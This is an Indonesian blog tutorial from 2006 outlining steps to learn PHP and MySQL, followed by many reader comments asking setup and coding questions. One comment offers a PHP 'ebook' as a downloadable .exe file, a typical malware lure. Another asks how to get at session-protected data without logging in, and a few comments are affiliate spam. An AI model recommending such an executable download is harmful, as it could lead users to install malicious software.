Jika Sang Khalik menghendaki, maka semua manusia akan memiliki warna kulit yang sama, agama yang hanya satu, tidak ada yang namanya negara, suku bangsa dan tidak ada perbedaan. Artinya Sang Khalik memang menghendaki adanya perbedaan. Perbedaan adalah hakekat penciptaan. Perbedaan itu indah.

Panduan Belajar PHP

Dikirim: August 26th, 2006 | Oleh: | Kategori: PHP | 176 Komentar »

Bermula dari pertanyaan seseorang mengenai bagaimana belajar PHP, maka saya tuliskan beberapa langkah dibawah ini sebagai panduan untuk mempelajari PHP. Semoga bermanfaat.

Catatan: database yang digunakan adalah MySQL.

  1. PHP sebagai server side scripting secara umum digunakan untuk membuat situs dinamis atau aplikasi berbasis web. Jadi langkah awal untuk mempelajari PHP adalah menguasai HTML terlebih dahulu. Tanpa penguasaan HTML dasar, rasanya PHP kurang bermanfaat untuk dipelajari.Links untuk belajar HTML
  2. PHP adalah bahasa pemrograman, artinya untuk menguasai PHP haruslah mengerti algoritma. Minimal yang harus diketahui untuk hal ini adalah apa dan bagaimana menggunakan variable, kondisi atau pencabangan, perulangan dan sub-rutin untuk menyelesaikan suatu masalah. Saat ini sudah banyak buku yang membahas mengenai algoritma dan pemrograman, silakan cari dan pilih sendiri.
  3. Install Apache, PHP dan MySQL pada PC Anda. Saya menyarankan untuk tidak menggunakan installer yang instant (seperti PHPTriad, Wampserver, e-novative dsb), tetapi lebih baik belajar dan mencoba menginstallnya satu demi satu diawali dari Apache, lalu PHP dan MySQL.Link panduan menginstal Apache, PHP dan MySQL
  4. Setelah langkah 1 & 2 sudah dipelajari dan sudah dimengerti (meskipun hanya sedikit) dan langkah 3 sudah bisa Anda lalui. Langkah berikutnya adalah mempelajari sintaks-sintaks dari PHP dan Anda wajib memiliki atau mendownload file Help PHP.Link untuk belajar PHP
  5. Coba untuk membuat form isian sederhana menggunakan PHP beserta HTML yang telah dikuasai. Lalu, tambahkan fitur validasi untuk beberapa atau semua data sehingga tidak boleh kosong saat submit ditekan.Links Tutorial membuat form
  6. Pelajari juga teknik session dan atau cookies. Ini penting dan sangat sering digunakan dalam pembuatan situs dinamis atau aplikasi berbasi web. Pada langkah ini, minimal Anda bisa membuat halaman login dengan user dan password yang masih ditulis secara hardcode dalam script.Links tutorial session dan cookies
  7. Langkah berikutnya adalah mempelajar seluk beluk mengenai database seperti apa itu database, table, record, field dsb. Download dan pergunakan phpMyAdmin untuk mencoba membuat database, table dan field-fieldnya.
  8. Pelajari SQL khusus untuk empat perintah dasar yaitu SELECT, INSERT, UPDATE dan DELETE. Perintah SELECT adalah perintah SQL yang paling kompleks karena meliputi klausa JOIN (INNER/OUTER), WHERE, GROUP BY, HAVING, ORDER BY dan LIMIT (limit adalah klausa yang diperkenalkan MySQL).Link tutorial SQL
  9. Setelah perintah SQL bisa Anda mengerti (syukur-syukur menguasai), maka pelajari bagaimana PHP berinteraksi dengan MySQL. Pada langkah ini, Anda diharuskan menguasai fungsi-fungsi wajib sehubungan dengan MySQL, yaitu mysql_connect_db, mysql_select_db, mysql_query dan mysql_fetch_object / mysql_fetch_array.Download Help MySQL.
  10. Sampai disini, coba untuk membuat script sederhana untuk input data menggunakan form. Data yang diinput melalui form disimpan dalam database (INSERT). Lalu buat juga script untuk menampilkan data-data yang telah tersimpan dalam database (SELECT). Selanjutnya, buat fasilitas untuk mmenghapus (DELETE) dan mengedit data (UPDATE).
  11. Coba membuat halaman login dimana user dan passwordnya dibaca dari database
  12. Coba gabungkan karya nomor 10 dan 11 sehingga hanya mereka yang login saja yang bisa menghapus/mengedit data.
  13. Sampai disini, Anda bisa dikatakan sudah sampai pada tahap beginner. Selanjutnya banyak-banyaklah bereksperimen dengan membuat proyek-proyek kecil minimal untuk kesenangan Anda sendiri. Saat Anda mengerjakan proyek, disanalah pelajaran demi pelajaran bisa Anda dapat dari berbagai masalah yang muncul.
  14. Selanjutnya, Anda harus mulai mempelajari masalah security seperti masalah Code/SQL Injection, session hijacking, session fixation, teknik enkripsi dsb.
  15. Sempatkan untuk belajar Javascript saat Anda merasa kemampuan PHP yang dimiliki sudah lumayan. Kelemahan dari script PHP adalah tidak dimungkinkannya interaksi pengguna secara on the fly. Nah, kekurangannya inilah yang di “tambal” menggunakan Javascript. Syukur-syukur Anda bisa menguasai AJAX.Link tutorial Javascript
  16. Sempatkan pula untuk mempelajari CSS. Ini penting untuk membuat tampilan/interface situs atau web-based application secara lebih baik.Link tutorial CSS:
  17. Terakhir. Karena PHP lebih banyak hidup di OS Linux, pelajari juga linux barang sedikit. Syukur-syukur kalo Anda ternyata sejak awal belajar di linux

TIPS:

  • Jangan terlalu memaksakan untuk menghapalkan fungsi, sintaks dari PHP atau MySQL. Manfaatkan file HELP dalam praktek dan latihan. Semakin Anda sering praktek dan melatih diri, maka fungsi dan sintaks yang sering dipakai akan bisa Anda hapal dengan sendirinya.
  • Jangan terlalu cepat untuk mengambil keputusan untuk bertanya terhadap masalah atau kesulitan yang timbul. Bertanyalah setelah Anda mencoba terlebih dahulu.
  • Rajin-rajin mengikuti milis atau forum dan selalu ingat, diatas langit ada langit ;)

176 komentar untuk “Panduan Belajar PHP”

  1. 1
    Ali
    berkomentar pada jam 10:30 am
    tanggal 28 August 2006

    Kelemahan dari script PHP adalah tidak dimungkinkannya interaksi pengguna secara on the fly. Maksudnya itu bagaimana?Bisa dijelaskan lebih detil lagi.

  2. 2
    sarge_kecil
    berkomentar pada jam 3:27 pm
    tanggal 11 September 2006

    b-)

  3. 3
    prachie_iwd
    berkomentar pada jam 12:10 pm
    tanggal 18 September 2006

    :(( susah bangeettttttttt
    tolong bantuin gue donk?

  4. 4
    imanez
    berkomentar pada jam 2:12 pm
    tanggal 20 September 2006

    om, gak tau ini d luar jalur apa nggak, mo nanya kalo bikin fasilitas forum dan chatt di website menggunakan php apa program laen??
    sorry kalo gak nyambung maklum aku orang baru dalam hal ini :d

  5. 5
    iwan
    berkomentar pada jam 4:05 pm
    tanggal 27 September 2006

    tutornya ok banget !!! gue salut :)>-
    emang kalau pake’ yang instan itu mudah (PHPTriad), kaya’ gue contohnya. habisnya kalo install satu-satu sering error jadi ya gitu deh:d
    eh… ternyata gue nemuin halaman ini, gue bisa nanya kaga’ soal konfigurasi apache yang cukup susah itu.
    emang apache kalau disetup itu larinya ke program files ya (gua pake’ windows xp), beda klu pake’ phptriad folder apachenya lari ke C:\apache
    kalau udah begitu apakah apachenya masih bisa beroperasi ? oh ya juga indikasi apache udah running itu apa ya ? selain memanggil dari localhost tentunya :)

  6. 6
    tamu
    berkomentar pada jam 2:49 am
    tanggal 28 September 2006

    \:d/ mantaf….

  7. 7
    gagah ws
    berkomentar pada jam 5:20 pm
    tanggal 28 September 2006

    Tolong pembahasan lebih deatail !!!
    Kirimkan saya , Cara belajar PHP sebagai pemula , Please!!!!!!!!!!!
    Thanks for your attention!!!!

  8. 8
    Riyogarta
    berkomentar pada jam 11:40 am
    tanggal 29 September 2006

    @gagah
    detil? duh .. sebegini ajah udah panjang :)

  9. 9
    Feriadi
    berkomentar pada jam 11:12 am
    tanggal 3 October 2006

    Boss tulis juga dong tutorial yang menggunakan database selain MySql co: SQL Server 2000 atau oracle bagaimana konfigurasinya dengan PHP dan keunggulannya. Jgn lupa includekan juga program contohnya sehigga kita mudah untuk mempelajarinya..

    salam,:)

  10. 10
    fuan
    berkomentar pada jam 5:32 am
    tanggal 8 October 2006

    bosss gua ada proyek untuk buat interfase dengan PHp gmn caranya ya?

  11. 11
    saya
    berkomentar pada jam 2:15 pm
    tanggal 8 October 2006

    kalo misal http://domain.com/?=2 gimana bikinnya (dimenunya) dan file2 yang dibutuhkan apa saja yah? dan juga bagaimana sih scriptsnya mohon pencerahannya

  12. 12
    Riyogarta
    berkomentar pada jam 2:29 pm
    tanggal 8 October 2006

    @imanez
    Forum, bisa belajar banyak dari phpbb, http://www.phpbb.com/

    @iwan
    Dilihat statusnya di service.

    @gagah
    Link sudah saya kasih tinggal baca toh? Mau lebih lengkap? Waduh .. :-? #-o

    @fuan
    PHP tidak pernah bisa membuat interface. PHP hanya memanfaatkan HTML untuk membuat interface-nya.

    @Feriadi
    Mmm, kapan-kapan yah :-? :-w #-o

    @saya
    Duh .. kalau tanya nya begini mah … jelasinnya juga bingung. Mending kamu belajar dulu deh dari awal.

  13. 13
    maniek
    berkomentar pada jam 11:16 am
    tanggal 16 October 2006

    gua binggung banget belajar php, gua pernah pake phptriad ada beberapa perintah gak jalan, dan juga pada saat bikin pelacakan gak mau jalan, katanya sih configur di apache kurang bagus,

    kalau ada boleh mintak settingan apache yang standar dan bagus gak
    thx

  14. 14
    rukhin
    berkomentar pada jam 11:30 am
    tanggal 16 October 2006

    bagaiman caranya aku bisa bikin halaman forum seperti ini ya.?? tolong donk kasih sourcenya.. place… help me..

  15. 15
    Nobon Andra
    berkomentar pada jam 12:14 pm
    tanggal 19 October 2006

    Salam kenal. Bagusnya klo mau belajar PHP gunakan Winlamp 031 yang sudah memiliki paket lengkap (PHP, MySql, Apaceh, serta manualnya), tanpa konfigurasi ulang karena konfigurasi defaultnya sudah bagus dan langsung bisa digunakan.
    PHP hanya script, sama dengan bahasa WEb lainnya, pasti numpang dengan HTML.
    Klo ada project email aja yach ;)

  16. 16
    Angga Dewanto A
    berkomentar pada jam 3:18 pm
    tanggal 31 October 2006

    Untuk Gagah WS tolong hub aku
    nich aku dapet solusinya tentang masalahmu
    Ok……FBI’04

  17. 17
    amier
    berkomentar pada jam 7:59 am
    tanggal 7 December 2006

    nk tanya sikit ni. saya ada mencuba cara membuat flash chat memgunakan skrip asp..tetapi kenapa hasilnya begini

    http://staf.uum.edu.my/user10/chatroom.asp

    minta penjelasan daripada rakan2 semua..
    terima kasih

  18. 18
    ardy
    berkomentar pada jam 3:21 pm
    tanggal 23 December 2006

    bos minta bantuan dong ajarin aku membuat form komentar kayak ini :)>-

  19. 19
    Riyogarta
    berkomentar pada jam 11:47 am
    tanggal 24 December 2006

    @maniek
    Setingah apache standar ada pada paket apache-nya. Silakan didownload di http://www.apache.org

    @rukhin & @ardy
    Halaman ini menggunakan script wordpress 2.0, kalau mau source-nya silakan download di http://wordpress.org

    @amier
    salah tempay nih … posting ini membahas PHP Mas, bukan ASP :p

  20. 20
    BRAM
    berkomentar pada jam 12:37 pm
    tanggal 14 January 2007

    terima kasih kiriman “PANDUAN BELAJAR PHP”, cuma

  21. 21
    Nain
    berkomentar pada jam 12:20 pm
    tanggal 24 January 2007

    Minta bantuan dunk….?!
    Aq kan dah blajar buat script php. Script yg saya buat, mengakses data dari tabel mySQL.
    Di tabel tersebut, ada field namanya status, yang isinya mulai dari 0-5.
    Di tabel itu jg ada field datetime.
    Saya buat bbrp script yg mengakses data dmn status mulai dr 0-5, dan mengakses data berdasarkan tgl hari ini, bulan ini dan tanggal tertentu.
    Yg pengen saya tanyakan, gimana cara nggabungin script” tersebut, dan gimana biar scriptnya jadi lebih simpel.
    Mohon bantuannya…:)

  22. 22
    teddy
    berkomentar pada jam 11:12 pm
    tanggal 25 January 2007

    saya masih binggung, pilih asp atau php?

  23. 23
    Riyogarta
    berkomentar pada jam 1:01 pm
    tanggal 26 January 2007

    @Nain
    Mmm, kok saya nggak nangkep maksudnya yah hehehe. Bukannya bisa di select * from table where tgl=X and status=Y. X dan Y diinput dari form … gitu kali ya? :-?

    @teddy
    Silakan klik dan lihat disini

  24. 24
    Roydel
    berkomentar pada jam 2:44 pm
    tanggal 26 January 2007

    Teman2,
    aplikasi yang akan saya buat menggunakan database my-sql, tapi data untuk aplikasi tersebut harus diambil dari ms-access, jadi saya harus menggunakan data yang ada dalam access kedalam my-sql,
    apa teman2 bisa membantu bagaimana caranya agar saya dapat menggunakan data yang ada dalam ms-access kedalam my-sql.
    Data yang diinputkan akan selalu tersimpan dalam access, dan saya harus mengambil data tersebut untuk digunakan dalam mysql
    Terimakasih

  25. 25
    Tamu
    berkomentar pada jam 3:11 pm
    tanggal 30 January 2007

    Apakah mambo itu instalannya sudah termasuk ( php , mysql dan apache)?

    :)

  26. 26
    Riyogarta
    berkomentar pada jam 11:14 am
    tanggal 31 January 2007

    @Roydel
    convert msacces ke Excel, lalu import deh data di Excel tsb ke MySql. Kalau bermasalah convert ke CSV.

    @Tamu
    Nggak, Mambo hanya script CMS (content management system)

  27. 27
    caril
    berkomentar pada jam 12:56 pm
    tanggal 1 March 2007

    bisa kamu terangkan secara khusus bagaimana menggunakan perisian winLAMP

  28. 28
    Riyogarta
    berkomentar pada jam 1:05 pm
    tanggal 1 March 2007

    Silakan Anda lihat di http://sourceforge.net/projects/winlamp/

  29. 29
    Mot
    berkomentar pada jam 3:48 pm
    tanggal 5 March 2007

    wah mantap kali… saya kebetulan lagi mendalami php setelah belajar ttg jsp yg ribet bngt…. phpbb nyalagi coba diplajarin ni… tar klo mentok aku nanya ya

  30. 30
    pherdys
    berkomentar pada jam 1:50 pm
    tanggal 22 March 2007

    Gue heran dah kok nggak ada yang ngebahas urusan “text area” padahal kalau udah di buat banyak banget kendalanya dalam php, meskipun bisa di akalin pake fungsi tertentu.

  31. 31
    Riyogarta
    berkomentar pada jam 8:53 am
    tanggal 23 March 2007

    Banyak kendalanya? Rasanya tidak tuh :-?

  32. 32
    syarif
    berkomentar pada jam 8:56 am
    tanggal 3 April 2007

    saya mau tanya saya install php triad di OS vista co ga jalan ya

    ada yang tau ga saya harus pake persi yang mana ?
    saya butuh bantuannya !!!!! please :)>-:)>-

  33. 33
    Mas Iyan
    berkomentar pada jam 12:48 pm
    tanggal 13 April 2007

    :d:d wah terimakasih nih… tapi aku kok ga paham2 juga ya….

  34. 34
    adhayanti
    berkomentar pada jam 10:12 am
    tanggal 24 April 2007

    ikutan dong belajar php n minta arahannya kalo kesulitan:d

  35. 35
    andi
    berkomentar pada jam 3:55 pm
    tanggal 8 May 2007

    belajar bahasa pemrograman susah banget ya………….~X(~X(

  36. 36
    Marco
    berkomentar pada jam 6:29 am
    tanggal 16 May 2007

    Saya mau tanya, saya udah berhasil ngebuat website pakai script PHP dan Mysql. Saya menggunakan easyPHP atau semacam PHP Triad. Saat menggunakan easyPHP dan PHP Triad, script PHP berjalan lancar banget. Tapi begitu saya menggunakan XAMP 1.5 dan WAMP5, script PHP jadi tidak jalan. Bahkan begitu dipublish ke website juga tidak jalan. Ada yang tau gak penyebabnya? Pleasee kasih tau yah…. Thx..8-|

  37. 37
    Marco
    berkomentar pada jam 8:35 am
    tanggal 16 May 2007

    Wah sulit juga yah….:)

  38. 38
    faul
    berkomentar pada jam 1:35 am
    tanggal 21 May 2007

    Om Riyo…mantab banget info-nya berguna banget nih…trimssss

  39. 39
    bram
    berkomentar pada jam 9:50 am
    tanggal 30 May 2007

    salam semua…..

    gue pingin buat index.php isinya..
    1. ada kolom untuk header
    2. untuk isi terbagi 2
    3. ada fasilitas salam dinamisnya, siang,malam pagi
    4. ada buku tamu
    5 ada forum
    bentuknya kaya gini…

    —————————————————————————————-

    head
    —————————————————————————————
    :
    :
    :
    :
    : isi berita
    :
    :

  40. 40
    Riyogarta
    berkomentar pada jam 1:31 am
    tanggal 7 June 2007

    @syarif & @Marco
    Makanya, kan sudah saya bilang … baca nomor 3 dari panduan ;)

    @bram
    Buat dong ;)

  41. 41
    reyna
    berkomentar pada jam 2:14 pm
    tanggal 12 June 2007

    php di windows vista home premiun kok ga jalan ya??saya make’ apachetriad1.5.4…..ada yang tau caranya biar Apache,PHP n MySql bisa jalan di windows vista…???….minta pencerahannya dong….thx b4

  42. 42
    bram
    berkomentar pada jam 4:51 pm
    tanggal 13 June 2007

    sy udah buat situs pribadi dengan php, sy mo nanya sm tman smua
    1. gue mo beli domain, kira2 yang bagus apa, kasih referensinya….
    2. ada yg ngasi saran bli aja di telkom cepet…. tp ada jg yang bilang telkom susah diakses…. :((
    3. hatur nuhun seteuacanna…..:x

  43. 43
    edwar
    berkomentar pada jam 3:31 pm
    tanggal 18 June 2007

    :d/

    i=1
    while (i

  44. 44
    Arie
    berkomentar pada jam 5:39 pm
    tanggal 30 July 2007

    Nitip ngintip user agent + os. Hehe

  45. 45
    afan
    berkomentar pada jam 4:52 pm
    tanggal 21 August 2007

    :x:)saya tergila-gila dengan PHP.

  46. 46
    Riyogarta
    berkomentar pada jam 5:01 pm
    tanggal 21 August 2007

    Kalau Anda benar tergila-gila dengan PHP, silakan masuk ke http://ruangkopi.com :)

  47. 47
    aLe
    berkomentar pada jam 6:03 am
    tanggal 23 August 2007

    wah, banyak amit ya yg blm th :D *ctrl + D*

  48. 48
    desert-rabbit
    berkomentar pada jam 11:10 am
    tanggal 23 August 2007

    halo bos…pa kabar

  49. 49
    dedi
    berkomentar pada jam 1:45 pm
    tanggal 28 August 2007

    pada tahun 2007 masyarakat indonesia menggunakan jasa internet untuk mencari data yang mereka perlukan

    :)>- hehehe…..
    :) gw sangat bangga dengan negara indonesia

  50. 50
    sapta
    berkomentar pada jam 11:02 am
    tanggal 30 August 2007

    :-w tetap berusaha walaupun susah [-( tetap sabar dalam belajar dan slalu berdoa :)>-:) smga berhasil

    :(( tolongin gw dooooooong sw mo blajar bikin web nih aduuuuuh susahnyaaaaaa

  51. 51
    Fauzi
    berkomentar pada jam 4:45 pm
    tanggal 30 August 2007

    Hem… lengkap sekali saya paling baru sampai tahap 13.
    Jadi tertarik bikin demo dengan step-step ini.

    :)

  52. 52
    Catatan Belajar PHP » Hari 1- Instalasi XAMPP di Windows
    berkomentar pada jam 8:50 am
    tanggal 1 September 2007

    [...] membaca linknya om Riyo Panduan belajar PHP, jadi berpikir untuk mendokumentasikan proses belajar saya (siapa tahu bias berguna buat orang [...]

  53. 53
    ibnu muhammad
    berkomentar pada jam 9:08 pm
    tanggal 5 September 2007

    ikut nimbrung dong… eh tahu caranya nampilin image dari database kedalam web site gak? aku dah nyoba tapi bingung.

  54. 54
    acchunk
    berkomentar pada jam 6:13 pm
    tanggal 8 September 2007

    Gimana yah… install Apache udah Ok, MySQL juga Ok, Apache pun Ok
    tapi PhpMyadmin yang ngadat (error) TOLONG Pencerahannya.

    Acchunk-Maros Sul-Sel

  55. 55
    acchunk
    berkomentar pada jam 6:18 pm
    tanggal 8 September 2007

    Saya telah install :
    1. Apache versi 2.0.59-win32-x86 (sudah berhasil dengan indikator Running all Apache Service) dengan tampilan IE nya sbb :
    If you can see this, it means that the installation of the Apache web server software on this system was successful. You may now add content to this directory and replace this page.
    Seeing this instead of the website you expected?
    This page is here because the site administrator has changed the configuration of this web server. Please contact the person responsible for maintaining this server with questions. The Apache Software Foundation, which wrote the web server software this site administrator is using, has nothing to do with maintaining this site and cannot help resolve configuration issues.

    The Apache documentation has been included with this distribution.
    You are free to use the image below on an Apache-powered web server. Thanks for using Apache!
    2. MySQL Server dan Clients versi 4.0.18 dengan tampilan WinMySQLAdmin 1.4 sbb :

    #This File was made using the WinMySQLAdmin 1.4 Tool
    #28/08/2007 8:49:05

    #Uncomment or Add only the keys that you know how works.
    #Read the MySQL Manual for instructions

    [mysqld]
    basedir=C:/mysql
    #bind-address=127.0.0.1
    datadir=C:/mysql/data
    #language=C:/mysql/share/your language directory
    #slow query log#=
    #tmpdir#=
    #port=3306
    #set-variable=key_buffer=16M
    [WinMySQLadmin]
    Server=C:/mysql/bin/mysqld-max-nt.exe
    user=root
    password=1234

    3. Instalasi PHPMyadmin versi 2.10.3-english (INI TIDAK BERHASIL) dengan tampilan di IE sbb :
    phpMyAdmin – Error
    Cannot load mysql extension. Please check your PHP configuration. – Documentation
    PERTANYAANNYA
    Bagaimana Settingan yang benar, sehingga PHPMyadmin BERFUNGSI ????????

    TRIMS-NASRUN MAROS SUL-SEL:o

  56. 56
    Riyogarta
    berkomentar pada jam 7:11 pm
    tanggal 8 September 2007

    Masalahnya ada di mysql extension. Di PHP5, mysql sudah bukan sebagai database native lagi, tetapi menjadi extension. Buka php.ini, remark extension mysql. Copy libmysql.dll yang ada dlm paket PHP ke dalam directory windows/system.
    Untuk mengecek apakah mysql sudah aktif sebagai extension, lihat menggunakan phpinfo().

  57. 57
    acchunk
    berkomentar pada jam 9:32 pm
    tanggal 9 September 2007

    Sebelumnya trims atas pencerahannya, tapi mo nanya lagi nich….
    XAMPP ver 1.4.12 kalo udah diinstall nggak perlu perlu lagi dikonfigurasi di web server (katanya otomatis Apache, PHP5 & MySQL
    alias langsung digunakan.
    TRIM’S acchunk:)

  58. 58
    acchunk
    berkomentar pada jam 8:39 pm
    tanggal 10 September 2007

    Sebelumnya trims atas pencerahannya, tapi mo nanya lagi nich….
    XAMPP ver 1.4.12 kalo udah diinstall nggak perlu perlu lagi dikonfigurasi di web server (katanya otomatis Apache, PHP5 & MySQL
    alias langsung digunakan. (betul apa nggak
    Apa beda XAMPP dengan PHPTriad

    TRIM’S acchunk

  59. 59
    Chris
    berkomentar pada jam 2:46 pm
    tanggal 6 November 2007

    Saya mau download program PHP Triad, alamat downloadnya dimana, bantu saya dong. please………

  60. 60
    iin
    berkomentar pada jam 12:55 pm
    tanggal 7 November 2007

    Mas mo tanya, punya alamat url yang ngebahas tentang decompress file *.bz2 ato unzip pake php? Klo bisa yang ada contoh scriptnya yang dah pasti bener.
    Thanks b4…

  61. 61
    access
    berkomentar pada jam 3:23 am
    tanggal 8 November 2007

    Duh..
    Sumpah…sama sekali kagak ngerti gw
    :d

    Pengen bgt belajarnya.., tapi begitu di coba..
    Ugh..!! Yang ada malah pusing.. :o

    Gimana sih cara belajarnya ??

  62. 62
    pemula
    berkomentar pada jam 6:45 pm
    tanggal 15 November 2007

    Mas, mau nanya nih, saya download treemenunya, cara mengaplikasikannya bagaimana ya dalam template man form,

    mohon pencerahannya (boleh ke email saya agar lebih jelas mas)

    Terima kasih

  63. 63
    lia
    berkomentar pada jam 3:34 pm
    tanggal 19 November 2007

    saya sedang magang disebuah BUMN,saya diminta untuk membuat helpdesk,secara garis besarnya halaman 1 adalah untuk entry(tgl laporan,user yg melapor dan laporannya ttg apa) halaman 2 untuk disposisi(tgl disposisi,ditujukan ke siapa dan isinya apa) halaman 3 untuk follow uplaporan(tgl follow up,isi follow up,dan statusnya:done,inprogress,documented) saya juga harus buat history laporan.. yg ingin saya tanyakan saya harus mulai darimana??
    :((

  64. 64
    ari
    berkomentar pada jam 11:21 pm
    tanggal 20 November 2007

    cobaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

  65. 65
    ian
    berkomentar pada jam 6:46 pm
    tanggal 21 November 2007

    saya mau tanya.
    12345
    _2345
    __345
    ___45
    ____5

    gmn caranya angka yg hilang bs di ganti ( _ )
    tolong di jelas kan
    mohon di bantu kk senior

  66. 66
    web hosting indonesia
    berkomentar pada jam 5:07 am
    tanggal 24 November 2007

    OK, Kalau kamu sudah punya website.
    Bagaimana kalo gabung Affiliasi, So kamu bisa juga berpenghasilan dari website kamu.Kalau pengunjung website kamu melakukan order, maka kamu akan mendapatkan 10%dari order tersebut.

    Kamu bisa gabung di industri web hosting:

    http://www.duoserversindonesia.com/affiliate.html
    or langsung daftar
    http://www.duoserversindonesia.com/aff/jamaffiliates/index.php?req=newaccount&pid=1

    Belajar tentang Adsense, Adbrite, dan Affilliasi. kunjungi:
    http://www.cosaaranda.com/ banyak ilmu ttg cara cari duit dengan website kamu.

  67. 67
    acchunk
    berkomentar pada jam 12:40 pm
    tanggal 9 December 2007

    Bagaimana caranya membuka password di mysql, soalnya yang bikin
    databasenya udah nggak ada, tolong :((

  68. 68
    karyoto
    berkomentar pada jam 11:28 pm
    tanggal 28 December 2007

    saya mau belajar php gmn ya caranya terimaksih

  69. 69
    Syamsuri
    berkomentar pada jam 11:43 am
    tanggal 23 January 2008

    Bagus artikelnya, semoga bermanfaat bagi sesam dan memperolh pahala dari Allah SWT. Amin

  70. 70
    ijan
    berkomentar pada jam 9:53 pm
    tanggal 4 February 2008

    saya mau tanya nich…..saya kan nginsttall php, trus kalo mau mengetest keberhasilan install kan buka web browser dan masuk ke http://localhost/nama_file.php (nama_file adalah file contoh yang saya buat untuk test) tapi kok malah “object not define!” gitulah ,, kenapa ya..???apa karena saya pernah menginstall joomla sebelumnya.. soalnya ketika masuk ke http://localhost/ aja otomatis langsung masuk ke http://localhost/xampp/ ???..tolong kirim jawabannya ke email saya yahh..plisss bingung bgt.. baru belajar php nich..thanks. sebelumnya

  71. 71
    'can
    berkomentar pada jam 9:57 pm
    tanggal 25 February 2008

    saya mau minta bantuan nih nyari topik yang cocok buat tugas dari php…

  72. 72
    mualif
    berkomentar pada jam 3:49 pm
    tanggal 4 March 2008

    Mas bisa minta tolong saya diajarin PHP enggak ? anggap aja saya kursus jarak jauh tolong kirimkan ke email saya ini, kita bisa nego berapa sampai lulus. nah untuk prakteknya. atau kalau sampeyan ada waktu datang ke tempat saya di Batulicin (Kal-Sel) saya akan tanggung semua biaya transportasi dan makan selama memberi pelajaran pada saya + biaya kursusnya.

  73. 73
    sela
    berkomentar pada jam 1:39 pm
    tanggal 12 March 2008

    :)wah alhamdulliah siang ini saya dapat rezeki bisa gabung dengan para pecinta php.oh yach …mas ada tips biar mudah mulai belajar php ngga habis sampai detik ini banyak temen – temen ku yang ngga mau tugas akhir pakai program php katanya rumit .Saya pun masih penasaran ?

  74. 74
    bryan
    berkomentar pada jam 3:16 pm
    tanggal 7 April 2008

    mau tau donk bagaimana script pembuatan halaman friendster? yang satu user punya satu halaman sendiri2??? makasih yah sebelumnya….

  75. 75
    dherwan
    berkomentar pada jam 2:11 pm
    tanggal 2 May 2008

    Aduh bos, sebagai orang pemula banget di PHP, bingung banget bacanya. ~X(

    coba aku praktekin satu-satu deh langkah demi langkah.

    tapi thanks atas infonya ya

  76. 76
    lung
    berkomentar pada jam 10:48 am
    tanggal 28 May 2008

    mau tanya nih…..
    kalo misal kita mau ambil data /isi data di web lain (pake ereg itu loh) supaya data di web lain tsb bisa kita ambil n kita masukkan ke database kita, tapi halaman web lain tsb pake session, ada nggak kodenya???
    Coz aku bingung banget nggak ketemu2 caranya ato emang gak da caranya ya (session khan dibuat biar lebih aman, kalo data tetep bisa diambil khan namanya gak aman, tul gak…)

    jadi selama ini kalo aku mau ambil datanya harus login dulu ke web itu (biar sessionnya kebuka) baru data bisa diambil, kalo session mati gak bisa. Nah sekarang pengennya biar gak perlu login.

    Please bgt bantuannya, ato kasih referensi, aku komen disini coz baca bahasan “session hijacking” .

    Makasih sebelumnya ….. :)

  77. 77
    ok
    berkomentar pada jam 11:22 am
    tanggal 28 May 2008

    ok bos

  78. 78
    si bandel
    berkomentar pada jam 2:00 pm
    tanggal 28 May 2008

    Mas…
    kirimin aq istilah2 dalam php donk…
    mau belajar neh….
    mumpung masih muda, jadi harus banyak nimba ilmu…
    aq dah beli buku nya…
    tapi sering lupa istilah2 n perintah nya gitu…
    sial nya, di buku yg aku beli, ga ad daftar istilah n perintah nya…
    pusing deh…
    cuma di kasih form contoh, tanpa penjelasan…
    jadi ngerti nya setengah2 gitu…
    tolong yah…
    kirim via email dalam bentuk ap pun ^__^
    tolong bgt mas….
    hiks…
    hiks….
    thx b4

  79. 79
    www.sampara.com
    berkomentar pada jam 9:47 pm
    tanggal 17 June 2008

    Wah thanks for artikelnya yaa, oke punya deh
    Dari : http://www.sampara.com

  80. 80
    Desvianri sukardi
    berkomentar pada jam 9:33 am
    tanggal 25 June 2008

    cara membuat tanggal di website kayak mana?????????????????????????????????????????????????????????????????????????????????????????????? :) :) :) :) :) :) :) :) :) :)

  81. 81
    wulan
    berkomentar pada jam 6:04 am
    tanggal 3 July 2008

    permisi……..mo tnya ne.. :)
    1.php fungsi nya cm buat web ja?pa da yang laen?
    2.kalo udah buat program nya(pake php+mysql)tapi kebanyakan error di query sqlnya(mis:mysql_num_rows(),mysql_fecth_array()…) itu yang salah dmn y? wah dah bingung banget ne cr letak kesalahannya, di cek penulisannya dah bener trus apa ya?

    terimakasih a/ jawabanya..
    slam knal :d

    wulan’s last blog post..Setiap yang HIdup akan merasakan Mati

  82. 82
    zymanq
    berkomentar pada jam 3:44 pm
    tanggal 17 July 2008

    Terima kasih tips nya

    zymanq’s last blog post..Pengumuman COOP 2008

  83. 83
    Hadi
    berkomentar pada jam 1:36 pm
    tanggal 25 July 2008

    Hai semuanya,
    aq boleh ikut gabung ga’?
    aq juga suka menggunakan PHP dll

    Salam :ohmygod:

  84. 84
    erianda
    berkomentar pada jam 11:22 am
    tanggal 28 July 2008

    aku baru aja nyoba blajar php nih.. sangat membantu web ini
    http://abcarea.com

    erianda’s last blog post..Computer Based Information System (CBIS)

  85. 85
    pencarikerja
    berkomentar pada jam 10:13 am
    tanggal 31 July 2008

    ingin belajar dasar-dasar PHP?
    dapatkan ebook GRATISnya di:

    http://www.ziddu.com/download/1799597/Dasar-dasar_PHP.exe.html

  86. 86
    Hadi
    berkomentar pada jam 1:47 pm
    tanggal 31 July 2008

    btw, erianda ada lagi ga’ situs yang lain selain http://abcarea.com buat belajar PHP, oia soal buku PHP yang bagus karangan siapa yahh? :)

  87. 87
    anshell
    berkomentar pada jam 7:23 am
    tanggal 21 August 2008

    bloeh jga! :)

  88. 88
    aie
    berkomentar pada jam 7:21 am
    tanggal 1 September 2008

    emmm.. thank

  89. 89
    ahmed
    berkomentar pada jam 8:24 pm
    tanggal 1 September 2008

